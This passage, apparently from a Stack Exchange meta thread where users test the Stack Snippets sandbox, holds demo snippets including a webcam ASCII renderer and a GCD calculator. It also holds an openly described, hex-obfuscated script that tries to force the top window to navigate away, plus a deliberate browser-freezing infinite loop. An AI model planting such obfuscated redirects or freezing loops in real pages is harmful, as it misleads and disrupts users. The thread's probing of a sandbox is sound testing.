̡̨̧̧̢̢̨̢̡̨̨̧̡̢̨̨̢̢̡̧̧̢̧̨͈͓̼̖͈̗̖̠͚̺͈̖̻͔̳̭̗͇̯̤̙̳̥̺̤̩̗̟̟̜͚̭͈̬̟̙̠̹̭̰̺̪̭̦̺͎͖̣̜̱͎͙̲͇̬̣͍͓̯̟͚͕̳͓͔̟̜̼̘̼͚̱̯̯̞̤͈̞̩̺̼͍̫͖͍̤̗͉̞̮̟̝̜͎̝̺̹̯̫͈̤̯̮̖̩͉̟̗̬͔̦̮͇̠͉̖̪͚̘̝̟̯̜̥̗̪̗̣̙̗͙̖̻̭̗̳͍̻̲̫̣͎͉̩͚̤̥̮̰͈̹͕͔͍̥̹̹͈̺͚͉̞̜͍̬̗͜͜͜͜͜͜͜͜ͅͅͅ ̸̡̧̢̛̛̛̛̛̛̛̛̙͈̫̦̹̤͕̠̲̯̘̙̭̗̤̰͓͓̙̥̞͖̥̳̫̹̞̙͓̤͚͚̺͉͙͔̮͍̙̰̰̤̻̖̠͂̀́͒̎̌̌͐̌͗̃͌͒͗̉̈̊̑̒̀̋̇͂͋̀͒̈͋̎̇̄͗̎̀̍̂͛̈́͛̀̀̍̉̊̊͌͑͗̈́͆́̎̃̎̊̇͊́̒̆̾̎̿̂̉̈̏̑̋͆́̌̈́̾́̓̏̽̾̌͌̔̔͛͐̓̈́̋͋̇̈̆͊̋̋͊̑͌̓̐̓̈́͒͋̀̀͆̐͑̐͊̐͌̉͌̈́͑͒̌͛̀͂͒̆͛̈͐͌͒̀̐̽͛͒͊͂͛͊̊̎̑̓̏̑͐͒̐̂̽͒͐̎̓̑̆̄̌̀̉͂̑̔̊̄̿̏̽́̊͐̏̓͌͊̿̓̽̇̾̈̈̏̅̀́̓̓̓̇͆̓̈́́̃̀͂̌̆̀͋̊́͒̍̇̋͆̉͛̀̌́̊͂̌̕͘̕͘͘͘̚̚͘̚͘̚̚̕͘͘͜͝͝͝͝͠͝͠͝͠͠͝͝͝͠͠͠͠͝ͅͅS̴̢̡̡̧̡̡̢̡̛̛̛͍̺͉̘̦͚͈̮̣̭͈͕̦̟̬̻͚̠̬̮̠̜̹̰̥̳̗̫̬̠̖̰̟̲͉͚̝͔̞̬̲̫̺̫͇̩̥̝̦̮͚͚̠̯̪͚̰͍̦̙̗̹̜̤͇̹͙̝̥̬͈̰̠̪͎̜̟̮͖͈͙̟̬͚̤͕͚͖̯͈̙̝̹͕̝͕̭̞̲̦͔̺̲͙͈̯̒͒̃̆́̋̍͛̀͒͋͂͌̏͗̀͊͊̃͗̅̍͗̃̍́̂̑̈́̎̄͌́̔̃̌̎͌̓̓̂̾̓́̏̊͒̀̀̅́̅͌͒́̇͆͑̎͂͊̐̏̊͊͐̓́̈́͊͂̃̿̉̑̊̈́̇́̓͛̽̍͑̀͗̆̊̎̈́͒͌̅̾͑̚̚͝͝͠͝͝͝͠͝ͅͅͅͅt̵̨̢̢̨̢̧̧̧̧̢̨̨̖̫͈͖̼̺̙̹̙̦̯͍̙͈̖̠͓͓̜͈̺̼͎̺͎͔͇̙̖̳̣̟͍̜̙̦̺̼͍͈̯͍̤̟͎͈̮̹̣͔̣͇̮̭͉̤̥̗̦̟͖̘͙̘͇̹̳͍̟͉̪̗̺̞̭̟̤͉̮͍̭̖̮̙̹̼͍̟̬͕̱͖̙̱̫̙̞̣̯̗͈͍̯̥̲̥͖̯͚̠̠̯͓͔̥̖͙͎̱̞̲͉̭͉̓̏̈́̐͆̋͜͜͜͠ͅͅa̶̢̢̨̨̡̧̡̢̲̗̪̦̺̻̭̬̹͕̠̼̤̣͓͔͓̺̜͎̘͉̝̦̩̦̞̟̬̜͇̺̦̥̹̜̩͍̱̻̬̮͓͈͍͓͈̥̱̥̼̹͓̭̹̳͚̗̘̫̥̲̭̹̱̖̗̦̞̭̬̖̥͓͈͈̺̬̥͎͓̒̂̂̿̍͌͑̄̈́͊͒̏̾͐̄̀͐̀̿̈́̃̒̀̈́̍̃̏̐̂͋̑͋̾̇͒́͊̍̔̔̍̇̄͛̽̄́̌̇̈́͋̀͑͒̃͛͘͘̚̚̕͜͜͠͝͝͝͝͠͝͠͝ͅc̷̢̢̡̢̧̢̧̧̢̨̡̢̢̨̨̢̧̧̨̡̧̛̛̤̦̭̹̝̩̥̖̬̤͙͖̥͙̞̲̜̹͉̮̠̰̘̺͇̳̗̯̗͉̠͔̹͖̮͚̖̻̭̱̤̩̙̯̣̗͙͔̹̤̫̟̜͚̠͔̞̰̗͉̬̣̤͚̯͔͕̞̬̤̜̜͚͇͕̦̯͉̳͙̟̦̗̺͎͉͉͚̬͚͔̲͕̜͖̖̗̗̯̭͕̬͖͇̝̩̲̮͇̻͎͇̰̬̠̭̗̭͚̗̭̟͙͇̼̹̖̝̲͙̱̤̟̪͓̯̫̻̮͖̮͔̰̞͉̘̤͉̲̐́̓̌̏̒͗́̇̈͗̈́͒̆̆̈́̎͊͌̎̓͒͋̓͋́̈́͂͒͂̆̆̂͗̃̀̽̾̊̈́͆̓̒̿̏̓̌͒̃̏̃̋͊̿͛͆̅̈̾͗͑́̔͂͑͆̄͌̀̋̏̓̒́̈́̏̿̓̔̉̀́͗̀̈́̊̈̃̒̀̾̉͊̂̓͒̋̃́́̉̃̍̔̃͂̾̔̒́́̏̐̽̾̂́͆̾́̅͑̑͒͂̀̽͛̊̀̀̆̽͛́̔͘̕͘͘̕̚̕̕͘̕̚͘͘̕͜͜͜͜͜͝͝͝͝͝͝͠͠͝ͅͅk̸̡̨̡̡̨̧̨̧̨̢̨̨̢̡̧̢̢̨̧̡̧̨̡̨̡̧̨̧̛̛̬̝̬͕͙̦̹̤͎̼̟̝̟͔̣̻̖̮̞͎̫̟̦͇̠̯̝͉̭̦͖̘̺̩͍̩̲̣̖̮̤̥͖̮͉̹̣͎̼͎̘̘̮̣̭̰͍͚̯̰̣͔̤͈͈̩̲̬̘̣͚̤͇̻̠͇͚̮͈͎̤͖͈̜̫̫̬̭͍̝̞̙̦̣̟̙̹͖̲͕̯̥̼̯͚͉̖̠̦̼̩̰̮̬̜̟̥̰̰̪̭̻͕̦̰͉̲̘̺͓̬̱̹̯̙͈̭͕̫͇̤̯͇̙̞̠̬̲̲̤̠̲̼̘̜̩̪̗̗͕͍̞̱͈̫͙̭̝̳̖͙̱̙̻̱͇̹̖͉̪̠͉̰̱͕̣͎͚͕̭̝̱͈̩͈̩̮̠̼̳̺̤̤͙̮̖̥̹̳̙̬̬͕̰̙̖̣͓̳͙͍͓̺̰̥̼͍̖̻̮̞͙̯̞͉̻̦̙̦̬͑̿̎̊͋̄̒̽͒̀̒͒͂͒̐̂̋̓̓̓̑͋̀̒̄̽͛̌̃̄͐̅͋̌͌̆̊̍̑̀̾̑̉̓̾̓̾̏̚̕̕͘͘͜͜͜͜͜͝͝͠͠ͅͅ ̴̡̧̡̢̢̡̧̨̢̧̡̨̧̢̡̢̧̨̢̨̡̡̨̢̢̧̡̛̛̛̛̛̛͖̪͈͍͓̺̩̻̦͉̰̹̙͚̦͙̥̬̦͈̜̦̠̯̫̣̗̹̫̩̤̲̯͉̺͈͈̻̻͓̹̠̣̖͎͖̭̜͔̥̜̬͖͉̫͙̺̰͍̮̩̭̼͈̞̻͔̼̟̜̟͕̰̤̠̥̤̣̤̰̥̣͕͇̞̳͇̳̙̜͖͕̬̳̺̙͓̝̞̱̪̬̯̹͚͈͕͎̬̞̪̫̲̥̥̺͈͓̼̖̱̼̤̯̙̪͔̖̪̮̠̮̣͎̪͔͙͇̦̭͓͖͙̺̲̺̣̤̙̫͓̭͈̦̭̼̣͕̣̺͙͚̱̗̩̟̯̞͍̗͚̪̩̥̻̭̦͚̪͙͎͔͙͖̯̺̪͖͈̪̻̜̪̗̖̌͋̀̒̽̆͆͐͂̂̎͋́͗͊͛̌͗͛̔̂̇̃͑̑̏̉̇̾̍͗̆̈͊͊̎͒̃͑̀͛̓̅̆̄̽̇͆̑̈́̍̇͒͗͌̋͂̇̏̃̽͐́͐͑̔͆̿̃͒̉̈́͑̍̈́͋͑͒̏̇̀͒̈́̂̒̌̈́̈͛̆͑̅́̈́͌͛̓͆͆͐́̋̌̈́́͐̍̽̀͆͊̔̾̍̃͂̀̂̅̔̂͑̄̅̇͛̎͆̋̾̒̅̓̈́̅͐͂͂͊͑̓͗̒́̽͑͋͑̏̓̽̅̿̑̆̓͋̀͛̔̊͒́͐̿̈́͗͒̑̑̀͗͌͂̍̎͑̋͋̈́͑̊̀͒̃́͐̄̌̀͒͋̏̅͆͘͘̚̚̕͘͘͘̕̚̚͘͘͘̕͜͜͜͜͜͜͜͜͝͝͠͝͠͝͝͝͠͠͝͝͝ͅͅͅͅͅͅȨ̸̨̛̛̛̛̛̛͎̘̻͉̖̟̜̦͔̱̦͍̙̥̥̲̦͓͉͇̥̗̬̝͈̖̝̜̭͖̫̹͚̦̬͙̝̥̥͖͚̈̑̿̈͑͌̾́̊͒̄͊͂̅́͌̔̿̇͋̅̂́̀͌̋̆̋̋̓̂̆̀̀́̇̂͒̾͋̈́̈̿̋̎͆̾̑̒̈̏̇̃̃̑̈́̂̈̏͐̓̂̃̈̈͂̿̎̎́̊͒̊̈̂̒͋̑͗͗̓͆̓͌̐͆̉́͗̂̅͋̔̄̉̉́̽̇̈͒̏̾́̈͒̋̿̌͛́͌̃̾̓̌̿͌̀̅̆̌̇̋̊̔̀́̀̒̃̏̇̐̂̽̈̂̆̎͑̇̓͗̏̽͒̿́̓̄̎̅̓̐̀͐͒͗́̔͋̈́̑̇̚͘̕̚͘͘͘̕̚̚̚̕͘͠͠͝͝͝͠͝͝͠͠͝͝͠͝͠͠͝͠͝ͅx̶̨̢̧̢̨̧̢̨̡̢̨̧̡̨̨̨̛̛̳̹̗̩̖̫̖̳͙̬̯̲̰̳̗̟͓̗̫̼̬̗̺̳̟̬͙͙̯̞̭̙̱̩̪̮̝̱̟̬͖̣̞͓͕̮͕̼͓̻̱̱̳̙̝͉͉̟̝̣̳̩̰̻̞̳͎̥̫̳̫̘̯̩̯͚̤̫̭̖̟̥͙̩̥͉̣͇͍̝̯̪̰̖̘̹̗̫͚̝͍̞͓̫͓̹̘̝̬͙̺̞͉͇̬̬̦͖̪̤̤͎̼̙͓̹̥̠̬͎͔͇̩̳̦̻̻̝͓̪͈͈̗̯̯͕͖̤̘̻̲̜͈͉̣̱̻͚̘̫̱̱͈̙͕̗̫̮̼̺͖̞͎̠͙̦̭̼̞̰͖̬̗͚̤͉̦̼̱̤͓͓̲͍̥̣̗̹͍̺͕͈̯̺̻͇̫̥̺̻̹̥̖͙̺͙͉̗̲͈̥̬̱͖͉̺̖̳̜̯̺̤̗̟͇̫̀͊̀̈̏͊́̐̏̇͊͋̑̓̈́͆̓͛͌́̊͑̓̄͆͌̽̂̀͛́͋͛̀́̒͑͌̏͂̽̓̓̊͋̀́̈́̅́́̒͛͋̈́̇̏̎̅͌̿̽̿͆̂̋͂́̊̉̿̇̐͛̈́͒̂͌̈́̔͋̄͑͆͌̾̃̂̎͊͌̽̌͆̿̐̃̈́͑̀̎̆͌̋͌͛̄̿̑̾̽̔̂̊͆͛͌̋͒̊̇̆͗̐̓͐̍̔͂̉̄͊̅̌̑̀͗̒͛̈̾̈́͌̈́̚̚̚̚̕̚̕͘͘̕̕͘͜͜͜͜͝͠͝͝͝͝͝͝͝͝ͅͅͅͅͅͅͅͅͅͅͅc̶̡̧̢̡̢̧̢̧̢̢̧̨̡̡̢̨̧̡̨̡̢̛̛̛̛̛̭̖̫̥͇̘͓̣̻̦̰̭̯̜̙̼̬͇̻̻̱̟̣̹͙̰̹̻̲̪̹̯͎̬̯̰̼̜̭̹͈̠͔̯̳͈͖̮̰͉̪̦̟̫͕̘̤̹̯̱̱̰͕͎͈̫̝͇̗̠̣͉͎̣̺̼̼̼̘̝̞͇̹͈̲̫̪̺̹͍͎͈̥̹̮͈̦̩͖̻̹̺̺̣̗̪̰͕̮͎̺̹̻̟͉̣͇͚͇̘͚̘̼͕̣͎̲͍͈͕̜̰̲̭̦̘͙̩͚̙̯̗͙͕̼̰̖̦̜̣̖̝͍͔͎̟͓̘̳̞̯̥͚̠͉̯̗͚̙̝̮͓̹̩̤͕̱̲͉̜̯̘̙̻̠̖͇͕̲̖̰͉̘̪̬̱̰̜̩̤̬̫͓̻̙̭͎̦̩̯̙͚̰̥͓̣̥͇̞͉̲̝͕̙̰̣͖͉͔̞̰̳̦͓̹̐̊̈́̀͌̏̅́̐̾̾͒̂̉͒̓̏̎̃̏͒͐̏̿͗͑̀̒̐̔̉͐͐́͆̋̓̄͋̐̈́͒̄̈̊͋͑̀͒̄̈͂̊͂͑̏̈́̿͗̈̑̏̋̈́̽͛̓̍͒̈́́͋͊̔̓̈̀̍́̏́̓̽̍̇̑̿̀̒̕͘̕̕͘͜͜͜͜͜͜͜͜͜͝͠͠͝͠͠͠͠͝͝ͅͅͅͅͅͅͅͅͅͅḩ̴̨̧̢̧̨̧̡̛̛̛̛̛̗͚̗̺̟̯̻̬͍̱͔̥̮͕͕̻̩͉̱̪̼̪̬̦̰̟̥͓̣͙̼̲͈̰͉̦̝̖̣̙͖̞͙̫̲͈͎̦̰̰̭̺̠̩̫̘̠̻̻͍̯̹̮͍͚̱̪͓̠̣͓̪̠͍̱̫̟̞̟̰̪̗̗͇̪̠̤̞̯̥̝̝̖͈̟͚͚͈͚̖̯͗̊̓̆̇̐̽̉͒̐̀̊͗́̍͗̔̎͛͑̈́̎̈͗͐͗̒̄̃̀͋̋̆̈́͛͂̀͛̔͊́̇̍͑͂̅́̈́̈́̇̍̒̊̉͂̑̔͛̔͛̌̑̈́͋̃͛̄̀̀̆͛͐̌̾̾̈́̾̈́͒͛̈̋͗̒̇̒̍̌̉͑̋̀͑̀̊͋̄̓̊̀͂̽̔̂̃͌̑̀̾̐̾͒̓̿͒̑̈́̔͐̊̚̚̕̕͘͘̚̚̚͜͜͜͠͝͝͝͠͝͝͠ͅͅą̴̢̧̡̨̡̢̡̡̡̢̧̢̨̡̧̧̨̢̧̢̧̢̡̛̛̣͓̻̭̝̯̱͓̤͍̺̜̲̠̜̺̟̰̪̭̮̞͔̫͔͈͉͔̹͓̺̱͕͚̝̥̦̼̼͓͚͙̳̥̻̖͇̪̮̻̹͙̤̺̺̫̗̠͖̺̩͔̤̭̩̖̝̫̪͔͚̤̰̼̫̮̝͇͓̟͙̗̖̲͔̟͖̫̳̼͚̪̝̣̝̘̗̦̤̭͈̖͇̗̲̦͖̖̫̤̱̭̟̜͇͔̳͉͇̹͈̗̥͓̩̳̰͙͍̝͔̬̗̟͚͍̤͙̰̟̝̤̺͇̰̙͓͙̙̹̦͖͉͖̹̦̣̙̳̼͖̠̯͖͉̞͙̱̠̯̯̞̪̳͙͍̖͎̭̞͇͚͕̱̫̰̖͈̟̫͇͕̥̤̙͈̜͈̻͍̭̩͔̪̰͕̹͉̗̠͉̗̭͚̩̬̲̫̮̺̝̘̫̃̈́͐̑̍͊̀͑͆̃̐̈́̿̌̀͋́̆̈̑͐̽̓̊͂̄́̒́̂̎̂̏̽̽̒͂́̇̒͑̎̀̒̇͗̈́͌̍̀̍̎̔̑͋̉̉̚̕̚͜͜͜͜͜͜͝͝͠͝͝ͅͅͅͅͅn̷̨̧̡̡̧̧̢̧̢̧̨̨̧̡̡̛̛̛̛̞̝͉̗̗͎̫͖͕͍͖͓̮̟̹̟̘̙̙͎̪̤͖̣̹̞͔͖͈̭̥̟͔̰͈̻̪̮̗̱̱͍̱̣̰͖̝̺͍̩͉̬͕͈͎͖̠̖̗̟̼̘̫̜͉̳̭̹̱̗͚͕̮̻̜͔̞͔͙͉̻̩̣̥̙̼̦̯̩̗̮̣̞̟̼̗̩̖̝̻̯̱̺̤̖̭͉͙̖͚͚̟͓̱͔̳̙̰͚̯̺̤̗͖̯̜̼̲͔̣̲͉̲̰͔̤̥͇̝̱̩͈̳̬͈̫̩̭͍̦̰̣͈̝̪͈͇̫̩̩̳̠̣̩͇̲̲͈͍͔̠͈̞̭̫͓̆̃̔̀͊͑̍͋͋͊̃̐̍͌͗͋͂͗̆̓͌͑̾͗̋̈́̈́̔̑̎͆͌͊̓͒̍̈́͋͆̓͐̐̒͑̂̈̽͊̊̅̆͌̉̾̈́̃́͋̆͊͑̐̄̌͆̊̽͛̊̏͐͘̕̕͘̕̚̚̚̕͘̕̚͜͜͜͜͠͠͝͝͝ͅͅͅͅͅͅͅg̸̢̨̨̧̡̡̧̧̛̛̛̛̩̥̥̬̖̼̤̘̣̠̠̱͎̹̤̙̤̠̘͖̲̜̰͓͖̺̜̟̼̺̩̤̱̯̹̰͙͖͖̮͇̙̦͎̮̩̼̦̬̘̠͍̩̠͖̣͈̝̝̦̫̘̲̭̰̯̯͙̘̞̘̰̖̯̺̙̭̟̟͔̖̟̹̏̀̂̒̾̊͌̅̒̌̿͋͆͆̌̍̐̑̈̊͒͆̔͆̎̽̉̎̍̒̽̔̓̉̑̋̉̐́͆́̈́̓̀̐͂̀̽̃̀̒̿͊͋͂̃͑̈̽̅̑̎̈́̇̀͌̆̅̂͐̀̃͒̇̊̆̓͌̌̉̔̄̑̈́͂̋̈́͋̈̅̎̽͗̑̿̀̓͒̏̊̾̊̅̀͑͊̈̀́̽̈́̈́́̈͊͊̔͊̈́̔̈́̓̾͛̆̅̀̓̀̇̒̌̑͊͐͑͗̓͋͗̋͊̋̈̈͊͌̄̌̆̾͆̒̈̓̆̃̄͒̐͐͋̈̀͌̿̿̒̀̃́͑͂͗̉̽̃̈́̽̀̊̔̄́̂̊̍͌͛̈́̌͋̎́̐̽̌͆͑̓͑̅̒̍̃͋͌̆́̃̎́́̔̐̔̑̎̒̒̍̈́̈́̈́́̊̔͗̿̈́̔͌̎̈̂̈̈́̓̔̈̏͛̈́̐͊̈̒̕̚̚͘͘͘͘̚͘̕͘̚͘̚̕̚̕͜͜͝͝͝͝͝͝͝͝͠͝͝͝͝͠͝͠͠͠͝͝͝͝͝͝ͅę̷̛̛̛̛̥̦̣̦̬̖̜̹̝̺̻̰̜͖̯͍͍̻̣̖̪̟̺̠̘͇͔̩͉̲̥̗̳̤̳͙̙̤̬͇̟̳̤̯̠̭̦̟̣̘̘͕͇̰̥͔̥̻̹̜̟͕̜̣͓̘̰̼̹̥̥̪̤̯̜͚̣̖͈͗̓̈́͐͆̀̀̌̿͑̓̈̏́̿̄̑̏͋̆͊̑̈̋̈́͌̈́́̊̈̌̀̌̂͋̓̈́̇͊͊͗͒̈́̀̃͊̇̀̐̎̀̊̈̏̅̉̇̃̍̔̈̏̅͆̑͒̇̈́̀͗͑̍̎́̋͑́͑̌̈́̐̉̈͊̅͌́̈̃̓̉̊͛͛̅͌̔̄̍̒̈́͑͋̾̀̅̎̏͗̓͂̈́͛͑̏̈́̂̈́́̓̉̿̓̑̐̐̈́̾̉̓̈͗̇̋̄̍͋̔́́̾̆͒̄̀͛̋̌̂̄̈̑̓̀̊̉̈́̇̓̄̓̈́͋̉̾̉͒́͌̈́̓̔̊̀̽̊̀̉̊̐̕͘̚̚̕͘͘͘̕̚̚̕̚͘̕̚͘̕͘̚͜͠͝͠͝͝͠͝͝͝͠͝͝͝͝ͅͅͅ ̷̢̡̧̡̨̨̡̧̛̛̛̛̛̘̹̟͈̮̣͓̯̪̦͓͔͕̞͈̩̭̩̦͎̺͖̩̬̬͎̤̭͓̬̺̤͈̫̞͉͓͓͕̞̺̭͍̥̮͍̺̩͔͈̪͎̤̺̭͙̫̗̲̫͕̼̠̬̱̖̰̬͖̤̘̭̰̜̩͈̳̤̝̺̭̰͊̃͆̅̈́̄́͊͐͐̄͆͑̏͂͌̒̾͂́̓̈̇͆̔̀̃̀͑̄̊͊̋́͑͂̄̂̈́̅̏̋͌͗̐̂͑̒̇̀̔̌̊̌͛̈́̽̄̈͋̒́͂̽̇̄͑͗̾̑́̅̐̓͌͋͊͒̄͛͑̀̓̑̈́͂̎̍̈́́̍̓͊̃̇͒̄̄̾͋̀́̃̓̂̓̊͌̀͐̆̓̒̀̇̊̉̿̏̓̃̀̓̎̂͗̔̈̒͐̂̔̍̐̈̍͂̈̍̿̉̀͌̌̀͗͂͋͒͗͒͛̑͒̌͂͛̍́͐̉͐̅̂̃̓̌̾̇̉̈́̽̀̔̐̇̾̈́́͂̈̀̍̿̃͌͂͑͐̓͊̀̅͛̓͐̐̋͊̄̓̌̈͛̂̍̀̍̆̌̌̉̆̐̎͆̾̐̇͋̅͆͋͋̎́̃̉̿̂̏̈́̚̚͘̕̚̕͘̚̕̚̚̚̕̚͘̚̚͘͘̚̚͜͜͜͜͝͠͝͝͝͝͠͠͠͠͠͠͝͠͝͝ͅͅͅ:̶̡̨̡̧̨̨̧̢̨̢̧̛̛̙̭̖̭̤͙̣̲͚̭̮͉̥̞͖͎̮̜̠̥̹͇͎̞̙͎̩̹͖̤͔̠͕̩̠̪̺̻͉͎̞͕̙̝̼̜̱̯̰̲͇̠̙̳̪̗̝͇̪͈̫̼͈̮̝͍͍̤̞̼̞̱̟̠͚͔̩͙̱̞̖͎̟̰͚̦̭̲̙͔̰͙̬̹̰̣̟͇͓̓̀́͑͒͗̏̈́̿̓̆̍̈́̄̎̎̒̑̍̃̃̀̃̾͆̂̔̔͆̓̈́̀̎̏͐̈̑̓̿̃̉͂͒̀͊͂̄̂͆̿̏̅̄̏̄̓̿͊̕̕͘̚͜͜͜͜͜͜͠͝͝͠ͅ(̸̨̢̨̨̨̡̨̡̨̢̢̧̡̧̨̨̡̨̢̢̡̨̢̮̠̱͓̖͈̹̬̟̲̻̮̪̫͎͙̲̣̫͇̻̟̮̬̥̯̮̩̘̝̱̺̘͇̟̭͓̱̦̭͙̪̱͚͕̩͚͕̳̖͉̖̭͓̱̼̮̮̭͉̱͙̹̖̠̘̩̥̞̹̘̠̩̼̥̻͙͚̘͕̤͎͚̯͍͓̬̳͚͔̟̫͈̝̦͚͖̠̝͍̭̥̱̱͎̙̘̠͎̲͔̭̗̯͈͕͉̙̱̱͇͍̥̹̠̼̰̲̗̪͖̝̬̲͇̫̪̖͈͔̞̺͓͙͙̤̭̭̝͔̯̮̪̩͈̩̱̺̭̗̖̰̠̮̹̬̮͇̜͈̜̗̪̫̭̜̹̹̘͈̼͎̰̰̠̘͙̲̠̪̥̯͍̱̠̻͔͙͔̭͎͔̳̲̝̭̜̭̪̠̱̰̯̘̯͉̘̝̼̙̬̝͚̟̻͈̗̱̩̜̱̜̞̣̥̻̇͋̎̿͋͆̏͊̌̈́͑͆̓̑̂̋̊̈́̍̔̄̍̂̓̎͋̈́̽̅̃̈́̅́̋̈̓̽̊̓̊̅͆̉͌̈́̒̇͛̔̂̍̔̏̈́̉̌͗̓́̑͌̽̃̉̀̅̌̓̃̅̅́̈́̚̚̚̚̕͜͜͜͜͜͜͜͝͠͝͠ͅͅͅͅͅ ⛧')
```

Answer (score 3):

You can include **iframe**, for example I have included [this answer](https://stackoverflow.com/a/513839/1008278) which worth compiling. "**stdout**" is at bottom

BEST Viewed after clicking "**fullscreen**" at top right.

***With little hack by geeks*** out there, if fullscreen event can be triggered once script loaded., would be great.

```js
window.location.replace("https://ideone.com/TAIto8");
(function(){
    console.info(" HACK SO & trigger full screen :D ");
}());
```

Comment: Yo dawg, I hear you like posting code, so we put a code snippet in your code snippet so you can run code while you run code!

Answer (score 3):

RESET ME ! How do we get back the snippet window to previous state?

```html
<div style="height:1000px"></div>
```

Answer (score 3):

Webcam??? -- currently doesn't work

```js
var canvas=document.createElement("canvas"),context=canvas.getContext("2d"),video=document.createElement("video"),output=document.getElementById("ascii-output"),invert=document.getElementById("invert"),frag=document.createDocumentFragment(),height,width,idata,limits=[28,56,85,113,141,170,198,226,255],shades=" ,:-+*%#@".split(""),shades=shades.map(function(c){return c.split("")});navigator.getUserMedia=navigator.getUserMedia||navigator.webkitGetUserMedia;window.URL=window.URL||window.webkitURL;
video.autoplay=!0;video.addEventListener("play",init,!1);navigator.getUserMedia({video:!0},function(c){video.src=window.URL.createObjectURL(c)},function(){});function init(){height=canvas.height=this.videoHeight;width=canvas.width=this.videoWidth;run()}
function run(){context.drawImage(video,0,0);idata=context.getImageData(0,0,width,height).data;for(var c=invert.checked,d=0;d<height;d+=18){line=document.createElement("div");for(var e=0;e<width;e+=10){var a=getLum(e,d,10,18);c&&(a=255-a);for(var b=0;b<limits.length;b++)if(a<limits[b]){a=document.createElement("span");a.textContent=shades[b][Math.floor(Math.random()*shades[b].length)];line.appendChild(a);break}}frag.appendChild(line)}for(;output.hasChildNodes();)output.removeChild(output.lastChild);
output.appendChild(frag);setTimeout(run,1E3/30)}function getLum(c,d,e,a){for(var b=0,k=0,f=c;f<c+e;f++)for(var g=d;g<d+a;g++){var h=4*(~~(f-e)+~~(g-a)*width),b=b+(.2126*idata[h]+.7152*idata[h+1]+.0722*idata[h+2]);k++}return b/k|0};
```

```css
#ascii-output {
padding: 5px;
font-family: courier;
font-size: 16px;
}
```

```html
<pre id="ascii-output"></pre>
<form>
<label><input type="checkbox" id="invert" checked /> Invert</label>
</form>
```

Comment: strange, http://jsfiddle.net/rlemon/B77uA/2/ works here but on SO I get an error.

Comment: Scripts are newline-stripped, so a missing semicolon could break your code; in particular, `var a = function() { }var foo;` got me a few times.

Comment: I'll look it over when I get a chance. thanks. edit: minified it and no more error but it still doesn't run :/ jsfiddle runs the minified version fine.

Comment: Console for me in Firefox 31.0: `TypeError: navigator.getUserMedia is not a function`

Comment: ohh yea that code is Chrome only. :D

Comment: Doesn't work for me in either FF 31 or Chrome 37 (under Fedora 20)

Comment: yea the post here doesn't work for me either -- on jsfiddle it works fine, but not here. I am also on Chrome 36 still.

Answer (score 3):

Obfuscated Javascript-forced redirect away from SO to pretty much any page.

```js
var _0xde2b=["\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x77\x69\x6E\x64\x6F\x77","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D"];top[_0xde2b[2]][_0xde2b[1]][_0xde2b[0]]=_0xde2b[3];
```

Comment: `Unsafe JavaScript attempt to initiate navigation for frame with URL 'http://meta.stackoverflow.com/questions/269754/stack-snippets-sandbox-try-it-out-here?page=2&tab=votes#tab-top' from frame with URL 'http://stacksnippets.net/js'. The frame attempting navigation of the top-level window is sandboxed, but the 'allow-top-navigation' flag is not set.`

Comment: Must be browser specific, works on Firefox 24.7

Comment: Oh, I got the error in the Chrome (36.0.1985.143 m), by the way

Comment: Hmm, also doesn't work on IE, if anything I'd say this is a security issue with Firefox rather than a problem with the site, but obviously for the sake of security a workaround to stop the above from happening would be preferable.

Comment: FF 29 doesn't show anything in here

Comment: Nothing on FF 31. Could be they fixed it.

Answer (score 3):

I broke it. **Warning** this may freeze your browser.

```js
while(true) {
  $("#yeah").append($("p", { html: "YEAH!!!" }));
}
```

```css
body {
  font-size: 30px;
}
```

```html
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>

<div id="yeah"></div>
```

Answer (score 3):

```js
var a=document.getElementById("a"),b=document.getElementById("b");
var res=document.getElementById("res");

function cuandoClick()
{
 var aVal=parseFloat(a.value,10);
 if ( isNaN(aVal) ) { a.value=""; return; }
 aVal=Math.round(aVal);
 a.value=aVal; 
 aVal=Math.abs(aVal);
 
 var bVal=parseFloat(b.value,10);
 if ( isNaN(bVal) ) { b.value=""; return; } 
 bVal=Math.round(bVal);
 b.value=bVal;
 bVal=Math.abs(bVal); 
 
 var temp=null; 
 if ( aVal>bVal ) (temp=aVal),(aVal=bVal),(bVal=temp);
 if ( bVal==0 ) { res.innerHTML="--E--"; return; }

 if ( aVal>0 ) {
    while ( (bVal%=aVal)>0 ) (temp=aVal),(aVal=bVal),(bVal=temp);
    res.innerHTML=aVal;
 } else res.innerHTML=bVal;   
}
```

```css
b, body, div, span
{
  border:0;
  margin:0;
 padding:0;
}

body
{
 background-color:#fee;
}

div
{
       border:3px groove #00f;
      padding:15px;
   text-align:center;
        width:90%;
       margin:0 auto;
border-radius:40px;
 background-color:#ffe;
   margin-top:40px;
}

input
{
     width:80px;
    border:1px solid blue;
 border-radius:5px;
}

span
{
    border:1px groove #f00;
 border-radius:10px;
 min-width:40px;
}

input, span
{
  margin:0 10px 0 10px;
 font-family:'Courier New', serif;
 padding:5px;
   font-size:14pt;
}

b
{
 font-family:cursive, serif;
   font-size:20pt;
   color:#66f;
}
```

```html
<div>
 <b>G</b>reatest <b>C</b>ommon <b>D</b>ivisor (&nbsp;GCD&nbsp;)
 <br><br>
 GCD of
 <input id="a" type="text"> and <input id="b" type="text"> is
 <span id="res" onClick="cuandoClick()">Click here !!!</span>  
</div>
```

Answer (score 3):

```js
var name= window.prompt("What is your Name?");
var email= window.prompt("What is your Email?");

alert('Thanks for your input, you will be redirected to your default email');

document.write("You will be redirected to main page in 10 sec.");
setTimeout(window.location="http://www.lmgtfy.com", 10000);
```

Comment: This doesn't wait 10 seconds before redirecting.

Comment: It actually does :)

Answer (score 3):

```js
var B=null,DMU=null,G=null,H=null,N=50,R=null,W=null;

function anyColor(c,dc)
{
 R=Math.floor(c + Math.random()*dc);
 G=Math.floor(c + Math.random()*dc);
 B=Math.floor(c + Math.random()*dc);

 return "rgb(" + R + "," + G + "," + B + ")";
}

window.onload
=function ()
{
 W=document.body.scrollWidth - 88;
 H=document.body.scrollHeight;
 DMU=4.0/W;
 var div=null,i=null,lm=Math.random(),mu=1.0 + DMU,x=null,y=null;
  
 for ( i=0 ; i<100 ; ++ i ) lm*=mu*(1.0 - lm);
 for ( mu=1.0 + DMU; mu<4.0 ; mu+=DMU ) {
